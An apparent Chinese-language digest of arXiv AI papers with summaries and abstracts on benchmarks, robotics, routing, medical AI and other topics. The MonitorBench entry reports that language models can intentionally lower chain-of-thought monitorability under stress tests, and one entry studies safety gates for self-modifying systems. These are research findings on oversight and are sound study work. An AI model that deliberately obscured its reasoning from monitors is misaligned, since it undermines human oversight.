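基准真正考察的"不确定反馈下的验证行为"对应于 oracle 回答不再总是真值的情形,此处未展示。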
[AI-6] Not Search But Scan: Benchmarking MLLMs on Scan-Oriented Academic Paper Reasoning ICLR2026
【速读】:该论文旨在解决当前多模态大语言模型(Multimodal Large Language Models, MLLMs)在学术论文推理任务中仍局限于以检索为导向的范式、难以实现研究人员式的全文档理解与验证的问题。其核心挑战在于现有方法依赖相关性检索进行推理,无法有效支持对整篇论文的扫描式交叉验证和一致性检查。解决方案的关键是提出ScholScan基准,引入一种“扫描导向”(scan-oriented)的任务设定,要求模型像人类研究人员一样通读并交叉核验全文,识别潜在不一致问题;该基准包含1800个精心标注的问题,覆盖9类错误类型和13个自然科学领域,并提供证据定位与推理路径的细粒度标注及统一评估协议,从而系统性地评测和推动MLLM在复杂学术推理中的能力提升。
链接: https://arxiv.org/abs/2603.28651
作者: Rongjin Li,Zichen Tang,Xianghe Wang,Xinyi Hu,Zhengyu Wang,Zhengyu Lu,Yiling Huang,Jiayuan Chen,Weisheng Tan,Jiacheng Liu,Zhongjun Yang,Haihong E
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted to ICLR 2026
Abstract:With the rapid progress of multimodal large language models (MLLMs), AI already performs well at literature retrieval and certain reasoning tasks, serving as a capable assistant to human researchers, yet it remains far from autonomous research. The fundamental reason is that current work on academic paper reasoning is largely confined to a search-oriented paradigm centered on pre-specified targets, with reasoning grounded in relevance retrieval, which struggles to support researcher-style full-document understanding, reasoning, and verification. To bridge this gap, we propose ScholScan, a new benchmark for academic paper reasoning. ScholScan introduces a scan-oriented task setting that asks models to read and cross-check entire papers like human researchers, scanning the document to identify consistency issues. The benchmark comprises 1,800 carefully annotated questions drawn from nine error categories across 13 natural-science domains and 715 papers, and provides detailed annotations for evidence localization and reasoning traces, together with a unified evaluation protocol. We assessed 15 models across 24 input configurations and conducted a fine-grained analysis of MLLM capabilities for all error categories. Across the board, retrieval-augmented generation (RAG) methods yield no significant improvements, revealing systematic deficiencies of current MLLMs on scan-oriented tasks and underscoring the challenge posed by ScholScan. We expect ScholScan to be the leading and representative work of the scan-oriented task paradigm.
[AI-7] Information-Theoretic Limits of Safety Verification for Self-Improving Systems
【速读】:该论文旨在解决安全门(safety gate)在允许无限有益自我修改(unbounded beneficial self-modification)的同时,如何维持累积风险有界的难题。其核心问题是:是否存在一种机制,既能保证总真阳性率(True Positive Rate, TPR)之和发散(即持续获取收益),又能使总风险(delta_n)之和收敛(即风险可控)?作者通过形式化这两个条件——∑δₙ < ∞(有界风险)与∑TPRₙ = ∞(无界效用)——建立了二者相容性的理论边界。关键解决方案在于提出两类突破性结论:一是分类器型安全门在幂律风险调度下存在本质不可能性(Theorem 1),其TPR与风险呈幂律关系,导致无法同时满足两个条件;二是引入基于Lipschitz球验证器(Lipschitz ball verifier)的替代方案,可实现零风险(δ=0)且保持正向真阳性率(TPR>0),从而规避上述不可能性。该方法在预LayerNorm Transformer模型上结合LoRA(Low-Rank Adaptation)实现了大语言模型(LLM)规模的可证明验证,实证表明在GPT-2上可达到条件风险为0时TPR=0.352,显著优于传统分类器(如预算B=1.0时,分类器最大效用U*~87 vs 验证器~500,000)。
链接: https://arxiv.org/abs/2603.28650
作者: Arsenios Scrivens
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 27 pages, 6 figures. Companion empirical paper: doi: https://doi.org/10.5281/zenodo.19237566
Abstract:Can a safety gate permit unbounded beneficial self-modification while maintaining bounded cumulative risk? We formalize this question through dual conditions – requiring sum delta_n < infinity (bounded risk) and sum TPR_n = infinity (unbounded utility) – and establish a theory of their (in)compatibility. Classification impossibility (Theorem 1): For power-law risk schedules delta_n = O(n^-p) with p > 1, any classifier-based gate under overlapping safe/unsafe distributions satisfies TPR_n <= C_alpha * delta_n^beta via Holder's inequality, forcing sum TPR_n < infinity. This impossibility is exponent-optimal (Theorem 3). A second independent proof via the NP counting method (Theorem 4) yields a 13% tighter bound without Holder's inequality. Universal finite-horizon ceiling (Theorem 5): For any summable risk schedule, the exact maximum achievable classifier utility is U*(N, B) = N * TPR_NP(B/N), growing as exp(O(sqrt(log N))) – subpolynomial. At N = 10^6 with budget B = 1.0, a classifier extracts at most U* ~ 87 versus a verifier's ~500,000. Verification escape (Theorem 2): A Lipschitz ball verifier achieves delta = 0 with TPR > 0, escaping the impossibility. Formal Lipschitz bounds for pre-LayerNorm transformers under LoRA enable LLM-scale verification. The separation is strict. We validate on GPT-2 (d_LoRA = 147,456): conditional delta = 0 with TPR = 0.352. Comprehensive empirical validation is in the companion paper [D2].
[AI-8] Dynamic Lookahead Distance via Reinforcement Learning-Based Pure Pursuit for Autonomous Racing
【速读】:该论文旨在解决纯追踪(Pure Pursuit, PP)路径跟踪算法在自动驾驶车辆中因固定前瞻距离(lookahead distance)导致的性能局限性问题:前瞻距离过短虽能提升弯道跟踪精度但易引发直线段不稳定,过长则虽增强平顺性却降低曲线跟随准确性。解决方案的关键在于提出一种融合近端策略优化(Proximal Policy Optimization, PPO)与经典PP控制器的混合控制框架,通过训练一个PPO智能体在线映射车辆速度和多尺度曲率特征至动态前瞻距离指令,实现对单一可解释参数的实时自适应调整——实验表明该方法在仿真与真实小比例赛车平台上均显著提升圈速表现和未见赛道的泛化能力,且具备零样本迁移至硬件的能力。
链接: https://arxiv.org/abs/2603.28625
作者: Mohamed Elgouhary,Amr S. El-Wakeel
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注:
Abstract:Pure Pursuit (PP) is a widely used path-tracking algorithm in autonomous vehicles due to its simplicity and real-time performance. However, its effectiveness is sensitive to the choice of lookahead distance: shorter values improve cornering but can cause instability on straights, while longer values improve smoothness but reduce accuracy in curves. We propose a hybrid control framework that integrates Proximal Policy Optimization (PPO) with the classical Pure Pursuit controller to adjust the lookahead distance dynamically during racing. The PPO agent maps vehicle speed and multi-horizon curvature features to an online lookahead command. It is trained using Stable-Baselines3 in the F1TENTH Gym simulator with a KL penalty and learning-rate decay for stability, then deployed in a ROS2 environment to guide the controller. Experiments in simulation compare the proposed method against both fixed-lookahead Pure Pursuit and an adaptive Pure Pursuit baseline. Additional real-car experiments compare the learned controller against a fixed-lookahead Pure Pursuit controller. Results show that the learned policy improves lap-time performance and repeated lap completion on unseen tracks, while also transferring zero-shot to hardware. The learned controller adapts the lookahead by increasing it on straights and reducing it in curves, demonstrating effectiveness in augmenting a classical controller by online adaptation of a single interpretable parameter. On unseen tracks, the proposed method achieved 33.16 s on Montreal and 46.05 s on Yas Marina, while tolerating more aggressive speed-profile scaling than the baselines and achieving the best lap times among the tested settings. Initial real-car experiments further support sim-to-real transfer on a 1:10-scale autonomous racing platform.
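经典纯追踪转向律为 delta = atan(2L·sin(alpha)/ld),其中 L 为轴距、alpha 为目标点方位角、ld 为前瞻距离。下面的草图把它与一个随速度/曲率变化的前瞻距离调度组合起来;其中的增益与线性调度只是代替论文中学习得到的 PPO 策略的示意假设。

```python
import math

# Minimal pure-pursuit steering sketch with a speed/curvature-dependent
# lookahead. The gains and the linear lookahead schedule stand in for the
# learned PPO policy described in the paper; they are illustrative only.

WHEELBASE = 0.33  # meters, typical for a 1:10-scale F1TENTH car (assumed)

def lookahead(speed, curvature, base=0.6, k_v=0.3, k_c=2.0):
    """Longer lookahead at speed on straights, shorter in tight curves."""
    return max(0.3, base + k_v * speed - k_c * abs(curvature))

def pure_pursuit_steering(alpha, ld):
    """Classic pure-pursuit law: steer toward a goal point at distance ld,
    seen at heading error alpha (radians)."""
    return math.atan2(2.0 * WHEELBASE * math.sin(alpha), ld)

# Straight (zero curvature) at 4 m/s -> long lookahead, gentle steering
ld_straight = lookahead(speed=4.0, curvature=0.0)
# Tight curve at 2 m/s -> short lookahead, sharper steering for same alpha
ld_curve = lookahead(speed=2.0, curvature=0.4)
print(ld_straight > ld_curve)
print(pure_pursuit_steering(0.2, ld_curve) > pure_pursuit_steering(0.2, ld_straight))
```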
[AI-9] Trust-Aware Routing for Distributed Generative AI Inference at the Edge
【速读】:该论文针对生成式 AI(Generative AI)在去中心化和异构边缘设备上执行分布式推理时面临的可靠性挑战展开研究,旨在解决单个设备故障或异常行为可能导致整个推理过程中断的问题。传统基于尽力而为的对等路由机制无法满足此类场景下的容错需求。其解决方案的关键在于提出 G-TRAC 框架,该框架融合算法级路径选择与系统级协议设计:首先将路由问题建模为风险受限最短路径(Risk-Bounded Shortest Path)计算,并采用信任下界剪枝与 Dijkstra 算法相结合的多项式时间求解方法,在实际边缘规模下实现亚毫秒级中位路由延迟;其次引入混合信任架构(Hybrid Trust Architecture),通过稳定锚点维护全局声誉状态,并以轻量级背景同步方式向边缘节点分发更新,从而在动态环境中保障路由逻辑的高效运行。实验表明,G-TRAC 显著提升推理完成率、有效隔离不可靠节点,并在节点失效和网络分区条件下维持鲁棒执行能力。
链接: https://arxiv.org/abs/2603.28622
作者: Chanh Nguyen,Erik Elmroth
机构: 未知
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Artificial Intelligence (cs.AI); Networking and Internet Architecture (cs.NI)
备注: 11 pages, 10 figures. Preprint accepted at the 22nd Annual International Conference on Distributed Computing in Smart Systems and the Internet of Things (DCOSS-IoT 2026)
Abstract:Emerging deployments of Generative AI increasingly execute inference across decentralized and heterogeneous edge devices rather than on a single trusted server. In such environments, a single device failure or misbehavior can disrupt the entire inference process, making traditional best-effort peer-to-peer routing insufficient. Coordinating distributed generative inference therefore requires mechanisms that explicitly account for reliability, performance variability, and trust among participating peers. In this paper, we present G-TRAC, a trust-aware coordination framework that integrates algorithmic path selection with system-level protocol design to ensure robust distributed inference. First, we formulate the routing problem as a Risk-Bounded Shortest Path computation and introduce a polynomial-time solution that combines trust-floor pruning with Dijkstra's search, achieving sub-millisecond median routing latency at practical edge scales, and remaining below 10 ms at larger scales. Second, to operationally support the routing logic in dynamic environments, the framework employs a Hybrid Trust Architecture that maintains global reputation state at stable anchors while disseminating lightweight updates to edge peers via background synchronization. Experimental evaluation on a heterogeneous testbed of commodity devices demonstrates that G-TRAC significantly improves inference completion rates, effectively isolates unreliable peers, and sustains robust execution even under node failures and network partitions.
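摘要中"信任下界剪枝 + Dijkstra"的组合可以如下示意:先丢弃信任分数低于下界的节点,再在剩余子图上跑标准 Dijkstra。图结构、信任分数与 0.5 的下界均为虚构示例,并非论文数据。

```python
import heapq

# Sketch of the "trust-floor pruning + Dijkstra" idea from the abstract:
# edges into low-trust peers are skipped, then plain Dijkstra runs over
# the surviving subgraph. All numbers below are invented for illustration.

def route(graph, trust, src, dst, trust_floor=0.5):
    """graph: {node: [(neighbor, latency), ...]}; trust: {node: score in [0,1]}."""
    dist = {src: 0.0}
    prev = {}
    heap = [(0.0, src)]
    while heap:
        d, u = heapq.heappop(heap)
        if u == dst:                          # reconstruct path on arrival
            path = [dst]
            while path[-1] != src:
                path.append(prev[path[-1]])
            return d, path[::-1]
        if d > dist.get(u, float("inf")):
            continue
        for v, w in graph.get(u, []):
            if trust[v] < trust_floor:        # trust-floor pruning
                continue
            nd = d + w
            if nd < dist.get(v, float("inf")):
                dist[v], prev[v] = nd, u
                heapq.heappush(heap, (nd, v))
    return float("inf"), []

graph = {"A": [("B", 1.0), ("C", 5.0)], "B": [("D", 1.0)], "C": [("D", 1.0)]}
trust = {"A": 1.0, "B": 0.2, "C": 0.9, "D": 0.9}  # B is unreliable
cost, path = route(graph, trust, "A", "D")
print(cost, path)  # the cheap A-B-D route is pruned; A-C-D is chosen
```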
[AI-10] Seeing with You: Perception-Reasoning Coevolution for Multimodal Reasoning
【速读】:该论文旨在解决现有基于可验证奖励的强化学习(Reinforcement Learning with Verifiable Rewards, RLVR)方法在多模态大语言模型(Multimodal Large Language Models, MLLMs)中因共享奖励信号导致的感知-推理信用分配模糊问题,即优化过程虽能提升推理模式但难以可靠增强上游视觉证据提取的准确性。解决方案的关键在于提出一种双角色协同进化框架PRCO(Perception-Reasoning Coevolution),其核心机制是通过共享策略下两个协作角色——“观察者”(Observer)负责生成与问题相关的证据描述,“求解器”(Solver)基于该描述预测最终答案——并分别使用角色特异性的奖励信号:求解器利用可验证的结果奖励优化最终答案准确性,而观察者则通过求解器下游成功获得效用奖励,从而实现感知与推理模块的协同演化与精准激励。
链接: https://arxiv.org/abs/2603.28618
作者: Ziqi Miao,Haonan Jia,Lijun Li,Chen Qian,Yuan Xiong,Wenting Yan,Jing Shao
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 21 pages, 15 figures, 6 tables
Abstract:Reinforcement learning with verifiable rewards (RLVR) has substantially enhanced the reasoning capabilities of multimodal large language models (MLLMs). However, existing RLVR approaches typically rely on outcome-driven optimization that updates both perception and reasoning using a shared reward based solely on the final answer. This shared reward blurs credit assignment, frequently improving reasoning patterns while failing to reliably enhance the accuracy of upstream visual evidence extraction. To address this perception bottleneck, we introduce PRCO (Perception-Reasoning Coevolution), a dual-role RLVR framework with a shared policy. PRCO consists of two cooperative roles: an Observer that generates an evidence caption tailored to the question and a Solver that predicts the final answer based on this caption. Crucially, PRCO employs role-specific reward signals: the Solver is optimized using verifiable outcome rewards on the final answer, while the Observer receives a utility reward derived from the Solver’s downstream success. Extensive experiments across eight challenging multimodal reasoning benchmarks demonstrate that PRCO yields consistent improvements across model scales by over 7 points on average accuracy compared to the base model, outperforming prior open-source RL-tuned baselines.
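摘要中"求解器用可验证结果奖励、观察者由求解器下游成功获得效用奖励"的分角色信用分配,可用如下简化草图表示。0/1 奖励与按 caption 聚合的平均成功率是笔者的简化假设,并非论文的完整奖励设计。

```python
# Sketch of PRCO-style role-specific rewards: the Solver earns a verifiable
# outcome reward on the final answer; the Observer is credited only through
# the Solver's downstream success on its evidence caption. Simplified.

def role_rewards(predicted, gold):
    solver_reward = 1.0 if predicted.strip() == gold.strip() else 0.0
    observer_reward = solver_reward   # Observer's utility = downstream success
    return {"solver": solver_reward, "observer": observer_reward}

def caption_utility(outcomes):
    """Average downstream success over Solver rollouts that used one caption."""
    return sum(outcomes) / len(outcomes) if outcomes else 0.0

r = role_rewards("42", "42")
u = caption_utility([True, False, True, True])
print(r, u)
```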
[AI-11] MonitorBench: A Comprehensive Benchmark for Chain-of-Thought Monitorability in Large Language Models
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)中思维链(Chain of Thought, CoT)的可监控性问题,即当CoT与最终输出之间缺乏因果一致性时,CoT无法准确反映驱动模型行为的关键决策因素,从而导致其作为监控工具的有效性下降。解决方案的关键在于提出MonitorBench——一个系统性的、开源的基准测试平台,包含1,514个精心设计的测试实例和两类压力测试场景,用于量化评估不同LLM在多种任务下的CoT可监控能力。该基准揭示了结构化推理需求与CoT可监控性正相关、封闭源模型普遍监控能力较低以及模型能力与监控性呈负相关的现象,为未来LLM可解释性研究和监控方法开发提供了坚实基础。
链接: https://arxiv.org/abs/2603.28590
作者: Han Wang,Yifan Sun,Brian Ko,Mann Talati,Jiawen Gong,Zimeng Li,Naicheng Yu,Xucheng Yu,Wei Shen,Vedant Jolly,Huan Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 57 pages
Abstract:Large language models (LLMs) can generate chains of thought (CoTs) that are not always causally responsible for their final outputs. When such a mismatch occurs, the CoT no longer faithfully reflects the decision-critical factors driving the model’s behavior, leading to the reduced CoT monitorability problem. However, a comprehensive and fully open-source benchmark for studying CoT monitorability remains lacking. To address this gap, we propose MonitorBench, a systematic benchmark for evaluating CoT monitorability in LLMs. MonitorBench provides: (1) a diverse set of 1,514 test instances with carefully designed decision-critical factors across 19 tasks spanning 7 categories to characterize when CoTs can be used to monitor the factors driving LLM behavior; and (2) two stress-test settings to quantify the extent to which CoT monitorability can be degraded. Extensive experiments across multiple popular LLMs with varying capabilities show that CoT monitorability is higher when producing the final target response requires structural reasoning through the decision-critical factor. Closed-source LLMs generally show lower monitorability, and there exists a negative relationship between monitorability and model capability. Moreover, both open- and closed-source LLMs can intentionally reduce monitorability under stress-tests, with monitorability dropping by up to 30% in some tasks that do not require structural reasoning over the decision-critical factors. Beyond these empirical insights, MonitorBench provides a basis for further research on evaluating future LLMs, studying advanced stress-test monitorability techniques, and developing new monitoring approaches.
[AI-12] owards a Medical AI Scientist
【速读】:该论文旨在解决当前通用型AI科学家在临床医学领域应用受限的问题,即现有系统缺乏对医学证据的深度依赖和对特定数据模态(如电子健康记录、影像数据等)的适配能力,导致其生成的研究假设与临床实践脱节。解决方案的关键在于提出首个面向临床自主研究的框架——Medical AI Scientist,其核心创新包括:通过“临床医生-工程师协同推理机制”将系统性文献综述转化为可执行的循证研究构想,提升研究创意的可追溯性和临床相关性;并基于结构化的医学写作规范与伦理政策指导生成高质量科研论文初稿。该框架支持三种自动化程度递增的研究模式(基于文献复现、文献启发式创新、任务驱动探索),实验证明其在171个案例、19项临床任务和6种数据模态下均显著优于商用大语言模型(LLM),且生成的论文质量接近MICCAI会议水平,展现出在医疗健康领域实现自主科学发现的巨大潜力。
链接: https://arxiv.org/abs/2603.28589
作者: Hongtao Wu,Boyun Zheng,Dingjie Song,Yu Jiang,Jianfeng Gao,Lei Xing,Lichao Sun,Yixuan Yuan
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Autonomous systems that generate scientific hypotheses, conduct experiments, and draft manuscripts have recently emerged as a promising paradigm for accelerating discovery. However, existing AI Scientists remain largely domain-agnostic, limiting their applicability to clinical medicine, where research is required to be grounded in medical evidence with specialized data modalities. In this work, we introduce Medical AI Scientist, the first autonomous research framework tailored to clinical autonomous research. It enables clinically grounded ideation by transforming extensively surveyed literature into actionable evidence through clinician-engineer co-reasoning mechanism, which improves the traceability of generated research ideas. It further facilitates evidence-grounded manuscript drafting guided by structured medical compositional conventions and ethical policies. The framework operates under 3 research modes, namely paper-based reproduction, literature-inspired innovation, and task-driven exploration, each corresponding to a distinct level of automated scientific inquiry with progressively increasing autonomy. Comprehensive evaluations by both large language models and human experts demonstrate that the ideas generated by the Medical AI Scientist are of substantially higher quality than those produced by commercial LLMs across 171 cases, 19 clinical tasks, and 6 data modalities. Meanwhile, our system achieves strong alignment between the proposed method and its implementation, while also demonstrating significantly higher success rates in executable experiments. Double-blind evaluations by human experts and the Stanford Agentic Reviewer suggest that the generated manuscripts approach MICCAI-level quality, while consistently surpassing those from ISBI and BIBM. The proposed Medical AI Scientist highlights the potential of leveraging AI for autonomous scientific discovery in healthcare.
[AI-13] ChemCLIP: Bridging Organic and Inorganic Anticancer Compounds Through Contrastive Learning
【速读】:该论文旨在解决有机小分子与金属基配合物在抗癌药物发现中长期被视作独立化学领域的问题,这种割裂限制了跨域知识迁移,尤其体现在数据层面:有机化合物数据库庞大,而金属配合物数据稀缺。解决方案的关键在于提出ChemCLIP框架——一种基于对比学习(contrastive learning)的双编码器模型,通过学习共享的抗肿瘤活性而非结构相似性来构建统一的分子表征空间。该方法利用活动感知的难负样本挖掘策略,在60种癌细胞系上对44,854个有机化合物和5,164个金属配合物进行标准化训练,最终将结构迥异的化合物映射到256维嵌入空间中,使生物学功能相近的分子聚类在一起,从而实现有机-无机化学域的融合建模。
链接: https://arxiv.org/abs/2603.28575
作者: Mohamad Koohi-Moghadam,Hongzhe Sun,Hongyan Li,Kyongtae Tyler Bae
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 15 pages
Abstract:The discovery of anticancer therapeutics has traditionally treated organic small molecules and metal-based coordination complexes as separate chemical domains, limiting knowledge transfer despite their shared biological objectives. This disparity is particularly pronounced in available data, with extensive screening databases for organic compounds compared to only a few thousand characterized metal complexes. Here, we introduce ChemCLIP, a dual-encoder contrastive learning framework that bridges this organic-inorganic divide by learning unified representations based on shared anticancer activities rather than structural similarity. We compiled complementary datasets comprising 44,854 unique organic compounds and 5,164 unique metal complexes, standardized across 60 cancer cell lines. By training parallel encoders with activity-aware hard negative mining, we mapped structurally distinct compounds into a shared 256-dimensional embedding space where biologically similar compounds cluster together regardless of chemical class. We systematically evaluated four molecular encoding strategies: Morgan fingerprints, ChemBERTa, MolFormer, and Chemprop, through quantitative alignment metrics, embedding visualizations, and downstream classification tasks. Morgan fingerprints achieved superior performance with an average alignment ratio of 0.899 and downstream classification AUCs of 0.859 (inorganic) and 0.817 (organic). This work establishes contrastive learning as an effective strategy for unifying disparate chemical domains and provides empirical guidance for encoder selection in multi-modal chemistry applications, with implications extending beyond anticancer drug discovery to any scenario requiring cross-domain chemical knowledge transfer.
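ChemCLIP 这类双编码器对比学习的核心训练信号是对称的 CLIP/InfoNCE 式损失:同一行的有机/无机嵌入互为正样本,批内其余为负样本。下面的 NumPy 草图仅作说明,批大小、维度与温度系数均为示意值(论文实际共享空间为 256 维),不含论文的活动感知难负样本挖掘。

```python
import numpy as np

# Minimal symmetric contrastive (CLIP/InfoNCE-style) loss over paired
# embeddings, the kind of training signal a ChemCLIP-like dual encoder
# would use. Dimensions and temperature below are illustrative only.

def clip_loss(org, inorg, temp=0.07):
    """org, inorg: (N, d) L2-normalized embeddings; row i of each is a positive pair."""
    logits = org @ inorg.T / temp             # (N, N) similarity matrix
    labels = np.arange(len(org))
    def xent(l):                              # cross-entropy with matched diagonal
        l = l - l.max(axis=1, keepdims=True)
        logp = l - np.log(np.exp(l).sum(axis=1, keepdims=True))
        return -logp[labels, labels].mean()
    return 0.5 * (xent(logits) + xent(logits.T))

rng = np.random.default_rng(0)
emb = rng.normal(size=(8, 32))
emb /= np.linalg.norm(emb, axis=1, keepdims=True)
# Perfectly aligned pairs -> near-minimal loss; misaligned pairs -> higher loss
aligned = clip_loss(emb, emb)
mismatched = clip_loss(emb, np.roll(emb, 1, axis=0))
print(aligned < mismatched)
```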
[AI-14] Fine-Tuning Large Language Models for Cooperative Tactical Deconfliction of Small Unmanned Aerial Systems CVPR2026
【速读】:该论文旨在解决小型无人机系统(sUAS)在低空空域中运行时,如何在安全关键约束下实现可靠的战术避让(tactical deconfliction)问题。该任务涉及在密集、部分可观测且异构的多智能体环境中进行短时程(short-horizon)决策,需同时保障合作分离保证与运行效率。其解决方案的关键在于利用预训练大语言模型(LLM)作为决策主体,并通过两种参数高效微调策略——监督微调结合低秩适应(LoRA)和基于偏好微调结合组相对策略优化(GRPO),使模型输出对齐人类操作员的经验规则。研究构建了基于 BlueSky 空中交通模拟器的“仿真到语言”数据生成管道,生成符合安全规范的避让决策数据集,实验表明,监督 LoRA 微调显著提升了决策准确性、一致性及分离性能,大幅减少近距空中碰撞风险;而 GRPO 进一步增强了协同能力,但在与异构代理策略交互时鲁棒性下降。
链接: https://arxiv.org/abs/2603.28561
作者: Iman Sharifi,Alex Zongo,Peng Wei
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 15 pages, 6 figures, to be published in CVPR 2026 Workshop Proceedings
Abstract:The growing deployment of small Unmanned Aerial Systems (sUASs) in low-altitude airspaces has increased the need for reliable tactical deconfliction under safety-critical constraints. Tactical deconfliction involves short-horizon decision-making in dense, partially observable, and heterogeneous multi-agent environments, where both cooperative separation assurance and operational efficiency must be maintained. While Large Language Models (LLMs) exhibit strong reasoning capabilities, their direct application to air traffic control remains limited by insufficient domain grounding and unpredictable output inconsistency. This paper investigates LLMs as decision-makers in cooperative multi-agent tactical deconfliction using fine-tuning strategies that align model outputs to human operator heuristics. We propose a simulation-to-language data generation pipeline based on the BlueSky air traffic simulator that produces rule-consistent deconfliction datasets reflecting established safety practices. A pretrained Qwen-Math-7B model is fine-tuned using two parameter-efficient strategies: supervised fine-tuning with Low-Rank Adaptation (LoRA) and preference-based fine-tuning combining LoRA with Group-Relative Policy Optimization (GRPO). Experimental results on validation datasets and closed-loop simulations demonstrate that supervised LoRA fine-tuning substantially improves decision accuracy, consistency, and separation performance compared to the pretrained LLM, with significant reductions in near mid-air collisions. GRPO provides additional coordination benefits but exhibits reduced robustness when interacting with heterogeneous agent policies.
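背景示例(通用 LoRA,非论文代码):AI-14 使用 LoRA 做参数高效微调。LoRA 的核心是给冻结权重加一个低秩增量,其中 B 零初始化保证训练起点与原模型完全一致;下面是通用前向草图,缩放系数 alpha 取常见约定值。

```python
import numpy as np

def lora_forward(x, W, A, B, alpha=16.0):
    """LoRA 前向:y = x @ W + (alpha/r) * (x @ A) @ B。
    W: (d, k) 冻结;A: (d, r) 随机初始化;B: (r, k) 零初始化,r << min(d, k)。"""
    r = A.shape[1]
    return x @ W + (alpha / r) * (x @ A) @ B
```

可训练参数量为 d*r + r*k,远小于全量微调的 d*k,这正是其“参数高效”之处。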
[AI-15] T-Norm Operators for EU AI Act Compliance Classification: An Empirical Comparison of Lukasiewicz, Product and Gödel Semantics in a Neuro-Symbolic Reasoning System
【速读】:该论文旨在解决欧盟人工智能法案(EU AI Act)合规分类中神经符号推理系统内逻辑合取操作符选择对分类性能的影响问题。解决方案的关键在于通过对比三种t-范数操作符(Lukasiewicz、Product与Gödel)在LGGT+(Logic-Guided Graph Transformers Plus)引擎中的表现,量化其在准确率、假阳性率和边界案例召回率上的差异,从而揭示不同语义机制对模型可靠性与敏感性的影响。研究发现,虽然操作符类型影响显著(p < 0.001),但规则库完备性是决定性能的首要因素;Gödel操作符因最小值语义实现最高召回率(85%),但引入0.8%假阳性;而Lukasiewicz与Product操作符保持零假阳性但易漏判边界案例,提示混合语义策略为后续优化方向。
链接: https://arxiv.org/abs/2603.28558
作者: Adam Laabs
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 11 pages, 8 tables, open-source code and dataset at this https URL
Abstract:We present a first comparative pilot study of three t-norm operators, Lukasiewicz (T_L), Product (T_P), and Gödel (T_G), as logical conjunction mechanisms in a neuro-symbolic reasoning system for EU AI Act compliance classification. Using the LGGT+ (Logic-Guided Graph Transformers Plus) engine and a benchmark of 1035 annotated AI system descriptions spanning four risk categories (prohibited, high_risk, limited_risk, minimal_risk), we evaluate classification accuracy, false positive and false negative rates, and operator behaviour on ambiguous cases. At n=1035, all three operators differ significantly (McNemar p < 0.001). T_G achieves highest accuracy (84.5%) and best borderline recall (85%), but introduces 8 false positives (0.8%) via min-semantics over-classification. T_L and T_P maintain zero false positives, with T_P outperforming T_L (81.2% vs. 78.5%). Our principal findings are: (1) operator choice is secondary to rule base completeness; (2) T_L and T_P maintain zero false positives but miss borderline cases; (3) T_G’s min-semantics achieves higher recall at cost of 0.8% false positive rate; (4) a mixed-semantics classifier is the productive next step. We release the LGGT+ core engine (201/201 tests passing) and benchmark dataset (n=1035) under Apache 2.0.
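补充示例:摘要比较的三种 t-范数是标准模糊逻辑算子,定义可直接实现如下(在 LGGT+ 中作为规则前件的合取算子,具体接入方式为假设)。

```python
from functools import reduce

def t_lukasiewicz(a, b):
    """Lukasiewicz t-范数:max(0, a + b - 1)。"""
    return max(0.0, a + b - 1.0)

def t_product(a, b):
    """Product t-范数:a * b。"""
    return a * b

def t_godel(a, b):
    """Gödel t-范数:min(a, b)。"""
    return min(a, b)

def conjoin(truth_values, tnorm):
    """用选定的 t-范数对一条规则的多个前件真值做合取。"""
    return reduce(tnorm, truth_values)
```

对任意输入恒有 T_L ≤ T_P ≤ T_G:min 语义最“宽松”,对应摘要中 T_G 召回率最高但引入假阳性,而 T_L、T_P 更保守、保持零假阳性。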
[AI-16] Detecting low left ventricular ejection fraction from ECG using an interpretable and scalable predictor-driven framework
【速读】:该论文旨在解决低左心室射血分数(Low Left Ventricular Ejection Fraction, LVEF)在临床中常被漏诊的问题,尤其是在无症状阶段难以及时识别,从而限制了早期干预的可能性。为应对这一挑战,作者提出了一种结构化的检测框架——基于心电图的预测驱动型LVEF检测(ECG-based Predictor-Driven LEF, ECGPD-LEF),其关键在于将基础模型生成的诊断概率与可解释建模相结合,实现了高精度且具备机制透明性的LVEF风险评估。该方法不仅显著优于现有端到端黑箱模型和依赖商业算法的表格系统,在多个临床亚组中均保持稳健性能,还通过可解释性分析揭示了若干高影响力预测因子(如正常心电图、不完全左束支传导阻滞及前侧壁心内膜下损伤),这些特征本身即可实现零样本推理(zero-shot-like inference),表明心室功能障碍信息已隐含于结构化的诊断概率表示中,从而兼顾预测准确性与机制可解释性,支持未来通过引入新特征进行扩展并无缝集成至现有AI心电图系统。
链接: https://arxiv.org/abs/2603.28532
作者: Ya Zhou,Tianxiang Hao,Ziyi Cai,Haojie Zhu,Hejun He,Jia Liu,Xiaohan Fan,Jing Yuan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Applications (stat.AP)
备注:
Abstract:Low left ventricular ejection fraction (LEF) frequently remains undetected until progression to symptomatic heart failure, underscoring the need for scalable screening strategies. Although artificial intelligence-enabled electrocardiography (AI-ECG) has shown promise, existing approaches rely solely on end-to-end black-box models with limited interpretability or on tabular systems dependent on commercial ECG measurement algorithms with suboptimal performance. We introduced ECG-based Predictor-Driven LEF (ECGPD-LEF), a structured framework that integrates foundation model-derived diagnostic probabilities with interpretable modeling for detecting LEF from ECG. Trained on the benchmark EchoNext dataset comprising 72,475 ECG-echocardiogram pairs and evaluated in predefined independent internal (n=5,442) and external (n=16,017) cohorts, our framework achieved robust discrimination for moderate LEF (internal AUROC 88.4%, F1 64.5%; external AUROC 86.8%, F1 53.6%), consistently outperforming the official end-to-end baseline provided with the benchmark across demographic and clinical subgroups. Interpretability analyses identified high-impact predictors, including normal ECG, incomplete left bundle branch block, and subendocardial injury in anterolateral leads, driving LEF risk estimation. Notably, these predictors independently enabled zero-shot-like inference without task-specific retraining (internal AUROC 75.3-81.0%; external AUROC 71.6-78.6%), indicating that ventricular dysfunction is intrinsically encoded within structured diagnostic probability representations. This framework reconciles predictive performance with mechanistic transparency, supporting scalable enhancement through additional predictors and seamless integration with existing AI-ECG systems.
